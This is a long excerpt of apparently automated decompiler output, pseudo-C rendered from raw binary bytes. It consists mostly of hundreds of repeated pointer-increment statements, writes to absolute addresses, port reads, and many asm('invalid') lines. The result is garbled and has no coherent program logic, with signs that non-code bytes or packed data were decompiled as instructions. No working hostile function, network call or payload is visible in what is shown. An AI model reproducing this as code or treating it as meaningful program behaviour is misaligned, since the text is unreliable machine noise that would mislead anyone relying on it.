                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *_t1219 =  *_t1219 + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + _t1229;
                                                                        				 *0x0000004C =  *((intOrPtr*)(0x4c)) + 0x17;
                                                                        				 *0x00000018 =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *0x0000002B =  *((intOrPtr*)(0x2b)) + 1;
                                                                        				_t1230 = _t1229 + 1;
                                                                        				asm("invalid");
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 1;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18 +  &(_t1270[0x8520010]))) =  *((intOrPtr*)(0x18 +  &(_t1270[0x8520010]))) + _t1230;
                                                                        				_t1231 = _t1230 + 1;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *0xFFFFFFFFFFFFFFD8 =  *((intOrPtr*)(0xffffffffffffffd8)) + _t1187 + _t1187;
                                                                        				if ( *((intOrPtr*)(0xffffffffffffffd8)) <= 0) goto L41;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				 *((intOrPtr*)(0x18)) =  *((intOrPtr*)(0x18)) + 0x14;
                                                                        				asm("in al, 0x15");
                                                                        				 *_t1219 =  *_t1219 + 0x14;
                                                                        				 *0x00000019 =  *((intOrPtr*)(0x19)) + 0x14;
                                                                        				 *((intOrPtr*)(_t1219 + 0x32)) =  *((intOrPtr*)(_t1219 + 0x32)) + _t1231;
                                                                        				 *0x0000001A =  *((intOrPtr*)(0x1a)) + 0x14;
                                                                        				 *((intOrPtr*)(0x1a)) =  *((intOrPtr*)(0x1a)) + 0x14;
                                                                        				asm("adc eax, 0x10040");
                                                                        				 *0x00000034 =  *((intOrPtr*)(0x34)) + 0x14;
                                                                        				asm("in al, dx");
                                                                        				asm("adc eax, 0x40");
                                                                        				 *((intOrPtr*)(0x34)) =  *((intOrPtr*)(0x34)) + 0x14;
                                                                        				0x14055da();
                                                                        				 *((intOrPtr*)(0x34)) =  *((intOrPtr*)(0x34)) + 0x14;
                                                                        				asm("adc eax, 0x40");
                                                                        				_t871 = 0x34 + _t1219 + 2;
                                                                        				 *_t1231 =  *_t1231 ^ 0x00000014;
                                                                        				 *_t871 =  *_t871 + 0x14;
                                                                        				 *_t871 =  *_t871 + 0x14;
                                                                        				_a1092878454 = _t1219;
                                                                        				_t872 = _t871 + 1;
                                                                        				 *((intOrPtr*)(_t1219 + _t872 * 2)) =  *((intOrPtr*)(_t1219 + _t872 * 2)) + _t1231;
                                                                        				_t873 = _t872 + 1;
                                                                        				 *_t873 =  *_t873 + 0x14;
                                                                        				ds = ss;
                                                                        				 *((intOrPtr*)(_t873 + _t873)) =  *((intOrPtr*)(_t873 + _t873)) + _t1231;
                                                                        				 *_t873 =  *_t873 + 0x14;
                                                                        				_t874 = _t873 + 1;
                                                                        				asm("invalid");
                                                                        				 *_t874 =  *_t874 + 1;
                                                                        				 *_t874 =  *_t874 + 0x14;
                                                                        				 *_t874 =  *_t874 + 0x14;
                                                                        				 *_t874 =  *_t874 + 0x14;
                                                                        				 *((intOrPtr*)(_t1231 + _t1276)) =  *((intOrPtr*)(_t1231 + _t1276)) + _t1231;
                                                                        				_t875 = _t874 + 1;
                                                                        				 *_t875 =  *_t875 + _t1231;
                                                                        				_t1232 = 0x14006c00;
                                                                        				if ( *_t875 >= 0) goto L42;
                                                                        				_t876 = _t1287;
                                                                        				_t1288 = _t875;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t876 =  *_t876 + 0x14;
                                                                        				 *_t876 =  *_t876 + 0x14;
                                                                        				asm("in al, dx");
                                                                        				asm("adc eax, 0x156c0040");
                                                                        				_t877 = _t876 + 1;
                                                                        				 *((intOrPtr*)(_t877 + 0x11)) =  *((intOrPtr*)(_t877 + 0x11)) + _t1232;
                                                                        				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1232;
                                                                        				_t879 = _t877 + 2;
                                                                        				 *((intOrPtr*)(_t1219 + _t1232 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1232 + 0x40)) + 1;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				 *_t879 =  *_t879 + 0x14;
                                                                        				_t912 =  *0x4019 + _t1219;
                                                                        				asm("sbb [eax], eax");
                                                                        				_a66 = _a66 - _t912;
                                                                        				 *_t912 =  *_t912 + _t912;
                                                                        				asm("in al, 0xa");
                                                                        				if ( *_t912 <= 0) goto L51;
                                                                        				 *((intOrPtr*)(_t1270 + _t1276)) =  *((intOrPtr*)(_t1270 + _t1276)) + _t1237;
                                                                        				_t915 = (_t912 & 0x0000003e) + 2;
                                                                        				 *_t915 =  *_t915 + _t915;
                                                                        				_pop(ds);
                                                                        				 *((intOrPtr*)(_t915 + _t915)) =  *((intOrPtr*)(_t915 + _t915)) + _t1237;
                                                                        				 *_t915 =  *_t915 + _t915;
                                                                        				_t916 = _t915 + 1;
                                                                        				_t1194 = _t1193 + _t1193;
                                                                        				asm("invalid");
                                                                        				 *_t916 =  *_t916 + 1;
                                                                        				 *_t916 =  *_t916 + _t916;
                                                                        				 *_t916 =  *_t916 + _t916;
                                                                        				 *_t916 =  *_t916 + _t916;
                                                                        				_t917 = _t916 + _t1219;
                                                                        				asm("sbb [eax], eax");
                                                                        				asm("adc [edx+0x71], bl");
                                                                        				 *((intOrPtr*)(_t1237 + _t1270 - 0xffc0)) =  *((intOrPtr*)(_t1237 + _t1270 - 0xffc0)) + _t1237;
                                                                        				asm("invalid");
                                                                        				 *_t917 =  *_t917 + _t917;
                                                                        				 *_t917 =  *_t917 + _t917;
                                                                        				_t918 =  *0x20004019;
                                                                        				asm("sbb [eax], eax");
                                                                        				if( *_t917 >= 0) {
                                                                        					 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1237;
                                                                        					_t918 = _t918 + 2;
                                                                        					 *((intOrPtr*)(_t1219 + _t1237 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1237 + 0x40)) + _t1194;
                                                                        					 *_t918 =  *_t918 + _t918;
                                                                        					 *_t918 =  *_t918 + _t918;
                                                                        					 *_t918 =  *_t918 + _t918;
                                                                        					 *_t918 =  *_t918 + _t918;
                                                                        				}
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t918 =  *_t918 + _t918;
                                                                        				 *_t1219 =  *_t1219 + _t918;
                                                                        				 *_t1219 =  *_t1219 + _t1237;
                                                                        				 *((intOrPtr*)(_t918 + 0x35)) =  *((intOrPtr*)(_t918 + 0x35)) + _t918;
                                                                        				_t919 = _t918 + 1;
                                                                        				 *_t919 =  *_t919 + _t919;
                                                                        				 *_t919 =  *_t919 + _t919;
                                                                        				 *_t919 =  *_t919 + _t1194;
                                                                        				asm("adc eax, [edx]");
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t919 =  *_t919 + _t919;
                                                                        				 *_t919 =  *_t919 + _t919;
                                                                        				asm("in al, 0x38");
                                                                        				_t920 = _t919 + 1;
                                                                        				 *((intOrPtr*)(_t1219 + 0x42)) =  *((intOrPtr*)(_t1219 + 0x42)) + _t1194;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				 *_t920 =  *_t920 + _t1219;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				 *_t920 =  *_t920 + _t920;
                                                                        				asm("aam 0x1a");
                                                                        				_t921 = _t920 + 1;
                                                                        				 *_t1219 =  *_t1219 + _t921;
                                                                        				 *_t921 =  *_t921 + _t921;
                                                                        				 *((intOrPtr*)(_t1219 + 0x40 + _t921 * 2)) =  *((intOrPtr*)(_t1219 + 0x40 + _t921 * 2)) + _t1237;
                                                                        				 *_t921 =  *_t921 + _t921;
                                                                        				 *_t921 =  *_t921 + _t921;
                                                                        				_t922 = _t921 + _t1237;
                                                                        				asm("sbb al, [eax]");
                                                                        				 *_t922 =  *_t922 + _t922;
                                                                        				 *_t922 =  *_t922 + _t922;
                                                                        				asm("fcomp qword [edx]");
                                                                        				_t923 = _t922 + 1;
                                                                        				 *_t923 =  *_t923 + _t923;
                                                                        				 *_t923 =  *_t923 + _t923;
                                                                        				_t924 = _t923 + _t1194;
                                                                        				asm("sbb al, [eax]");
                                                                        				 *_t924 =  *_t924 + _t924;
                                                                        				 *_t924 =  *_t924 + _t924;
                                                                        				asm("fcomp qword [edx]");
                                                                        				_t925 = _t924 + 1;
                                                                        				 *_t925 =  *_t925 + _t925;
                                                                        				 *0x6C006877 =  *((intOrPtr*)(0x6c006877)) + _t1237;
                                                                        				 *((intOrPtr*)(_t1194 + _t1194)) =  *((intOrPtr*)(_t1194 + _t1194)) + _t925;
                                                                        				_t927 = _t925 + 1 + _t1237;
                                                                        				 *_t1237 =  *_t1237 - _t927;
                                                                        				 *_t927 =  *_t927 + _t927;
                                                                        				 *_t927 =  *_t927 + _t927;
                                                                        				_t1293 = _t1292 - 1;
                                                                        				asm("lahf");
                                                                        				if ( *_t927 <= 0) goto L54;
                                                                        				_t1220 = _t1219 + 1;
                                                                        				_t928 = _t927 + 1;
                                                                        				 *((intOrPtr*)(_t1220 + 0x40 + _t928 * 2)) =  *((intOrPtr*)(_t1220 + 0x40 + _t928 * 2)) + _t1237;
                                                                        				 *_t928 =  *_t928 + _t928;
                                                                        				_pop(ds);
                                                                        				 *((intOrPtr*)(_t928 + _t928)) =  *((intOrPtr*)(_t928 + _t928)) + _t1237;
                                                                        				 *_t928 =  *_t928 + _t928;
                                                                        				_t929 = _t928 + 1;
                                                                        				_t1195 = _t1194 + _t1194;
                                                                        				asm("invalid");
                                                                        				 *_t929 =  *_t929 + 1;
                                                                        				 *_t929 =  *_t929 + _t929;
                                                                        				 *_t929 =  *_t929 + _t929;
                                                                        				 *_t929 =  *_t929 + _t929;
                                                                        				 *((intOrPtr*)(_t1195 + _t1195)) =  *((intOrPtr*)(_t1195 + _t1195)) + _t929;
                                                                        				_t930 = _t929 + 1;
                                                                        				 *_t930 =  *_t930 + _t1237;
                                                                        				_pop(_t1238);
                                                                        				if ( *_t930 >= 0) goto L55;
                                                                        				_t931 = _t1293;
                                                                        				_t1294 = _t930;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t931 =  *_t931 + _t931;
                                                                        				 *_t931 =  *_t931 + _t931;
                                                                        				asm("fcomp qword [edx]");
                                                                        				_t932 = _t931 + 1;
                                                                        				 *((intOrPtr*)(_t1238 + _t1195 + 0x40)) =  *((intOrPtr*)(_t1238 + _t1195 + 0x40)) + _t1195;
                                                                        				 *((intOrPtr*)(_t932 + 0x11)) =  *((intOrPtr*)(_t932 + 0x11)) + _t1238;
                                                                        				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1238;
                                                                        				_t934 = _t932 + 2;
                                                                        				 *((intOrPtr*)(_t1220 + _t1238 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1238 + 0x40)) + _t1195;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t1220 =  *_t1220 + _t934;
                                                                        				 *0x40356000 =  *0x40356000 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t1195;
                                                                        				_t1196 = _t1195 + _t1195;
                                                                        				asm("invalid");
                                                                        				 *_t934 =  *_t934 + 1;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *((intOrPtr*)(_t1276 + _t1276 + 0x206c0040)) =  *((intOrPtr*)(_t1276 + _t1276 + 0x206c0040)) + _t934;
                                                                        				_t1240 = _t1238 + 2;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *((intOrPtr*)(_t934 + 0x7348)) =  *((intOrPtr*)(_t934 + 0x7348)) + _t1196;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t1240;
                                                                        				asm("sbb al, 0x40");
                                                                        				 *_t1220 =  *_t1220 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *((intOrPtr*)(_t1276 + 0xb6)) =  *((intOrPtr*)(_t1276 + 0xb6)) + _t1240;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t1240;
                                                                        				asm("sbb al, 0x40");
                                                                        				 *_t1220 =  *_t1220 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t1196;
                                                                        				asm("sbb al, 0x40");
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *_t934 =  *_t934 + _t934;
                                                                        				 *((intOrPtr*)(_t1294 + _t1196)) =  *((intOrPtr*)(_t1294 + _t1196)) + _t1240;
                                                                        				_t935 = _t934 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t935;
                                                                        				 *_t935 =  *_t935 + _t935;
                                                                        				 *_t935 =  *_t935 + _t1196;
                                                                        				asm("sbb al, 0x40");
                                                                        				 *_t935 =  *_t935 + _t935;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1240;
                                                                        				 *((intOrPtr*)(_t935 + 0x1c)) =  *((intOrPtr*)(_t935 + 0x1c)) + _t935;
                                                                        				_t936 = _t935 + 1;
                                                                        				 *((intOrPtr*)(_t1276 + 0xec)) =  *((intOrPtr*)(_t1276 + 0xec)) + _t936;
                                                                        				_t1241 = _t1240 + 1;
                                                                        				 *_t936 =  *_t936 + _t936;
                                                                        				 *_t936 =  *_t936 + _t936;
                                                                        				_t313 = _t1196 + _t1220;
                                                                        				 *_t313 =  *((intOrPtr*)(_t1196 + _t1220)) + _t1241;
                                                                        				if ( *_t313 <= 0) goto L56;
                                                                        				_t937 = _t936 + 1;
                                                                        				 *((intOrPtr*)(_t1276 + 0xb6)) =  *((intOrPtr*)(_t1276 + 0xb6)) + _t1241;
                                                                        				 *_t937 =  *_t937 + _t937;
                                                                        				ds = ss;
                                                                        				 *((intOrPtr*)(_t937 + _t937)) =  *((intOrPtr*)(_t937 + _t937)) + _t1241;
                                                                        				 *_t937 =  *_t937 + _t937;
                                                                        				_t938 = _t937 + 1;
                                                                        				_t1197 = _t1196 + _t1196;
                                                                        				asm("invalid");
                                                                        				 *_t938 =  *_t938 + 1;
                                                                        				 *_t938 =  *_t938 + _t938;
                                                                        				 *_t938 =  *_t938 + _t938;
                                                                        				 *_t938 =  *_t938 + _t938;
                                                                        				 *((intOrPtr*)(_t938 + 0x1c)) =  *((intOrPtr*)(_t938 + 0x1c)) + _t938;
                                                                        				_t939 = _t938 + 1;
                                                                        				 *_t939 =  *_t939 + _t1241;
                                                                        				_pop(_t1242);
                                                                        				if ( *_t939 >= 0) goto L57;
                                                                        				_t940 = _t1294;
                                                                        				_t1295 = _t939;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				asm("sbb [eax+eax*2], bl");
                                                                        				_t326 = _t940 + 0x7000401b;
